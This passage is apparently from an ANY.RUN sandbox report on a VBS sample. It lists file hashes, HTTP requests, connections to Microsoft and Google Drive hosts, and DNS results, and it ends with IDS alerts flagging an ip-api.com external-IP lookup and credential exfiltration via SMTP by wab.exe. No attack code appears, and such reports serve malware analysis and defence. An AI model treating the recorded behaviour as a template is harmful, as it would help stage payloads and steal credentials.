SHA256:CBC1B4ECC306CA565C2060132C6BCBEFF542E09636FDF9F7860A698E03F15251
1068powershell.exeC:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logtext
MD5:51A116C305687D5E885627C8EFB63E66
SHA256:B0A8315E7D574B1A0579FBF0D5DE80B9A12946A56DE21B0721B7BF00A16B486C
5672wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:7DEB79FF3630D24CE41F203E45AA2AD0
SHA256:2CE9FA73B409FF53460EAC970254004FDFED21883D4B0E512B123D12A7FC40BA
1068powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_muibtvx4.lvd.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
38
DNS requests
21
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6592
SIHClient.exe
GET
200
2.17.245.133:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
binary
409 b
unknown
1528
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D
unknown
313 b
unknown
3996
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
binary
471 b
unknown
4480
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D
unknown
binary
471 b
unknown
5672
wab.exe
GET
200
142.250.185.227:80
http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D
unknown
binary
724 b
unknown
5672
wab.exe
GET
200
142.250.185.227:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
unknown
binary
1.41 Kb
unknown
5672
wab.exe
GET
200
142.250.185.227:80
http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCRd4hKrA6aBAnnS3UYBsso
unknown
binary
472 b
unknown
5672
wab.exe
GET
200
142.250.185.227:80
http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCECzpBwEAqmZNCdn%2B9lFcFjc%3D
unknown
binary
471 b
unknown
5672
wab.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
text
6 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4828
svchost.exe
239.255.255.250:1900
unknown
6140
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3996
svchost.exe
20.190.159.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1280
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3996
svchost.exe
40.126.31.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3996
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
6544
svchost.exe
216.58.212.142:443
drive.google.com
GOOGLE
US
whitelisted
6544
svchost.exe
142.250.186.129:443
drive.usercontent.google.com
GOOGLE
US
whitelisted
3996
svchost.exe
40.126.31.67:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1528
backgroundTaskHost.exe
88.221.92.190:443
www.bing.com
Akamai International B.V.
NL
unknown

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.126.31.71
  • 20.190.159.0
  • 20.190.159.64
  • 20.190.159.2
  • 20.190.159.68
  • 40.126.31.67
  • 20.190.159.71
  • 40.126.31.73
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
drive.google.com
  • 216.58.212.142
shared
drive.usercontent.google.com
  • 142.250.186.129
unknown
www.bing.com
  • 88.221.92.190
  • 88.221.92.189
  • 88.221.92.134
  • 88.221.92.193
  • 88.221.92.132
  • 88.221.92.137
  • 88.221.92.136
  • 88.221.92.191
  • 88.221.92.192
whitelisted
arc.msn.com
  • 20.103.156.88
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 2.17.245.133
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID
Process
Class
Message
5672
wab.exe
Potential Corporate Privacy Violation
AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
5672
wab.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
5672
wab.exe
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External Hosting Lookup by ip-api
5672
wab.exe
Successful Credential Theft Detected
STEALER [ANY.RUN] Attempt to exfiltrate via SMTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
8dfc4da6cddbe96a8eee81460a0352846a686ae31b567742f4f7e19c0a778c46.vbs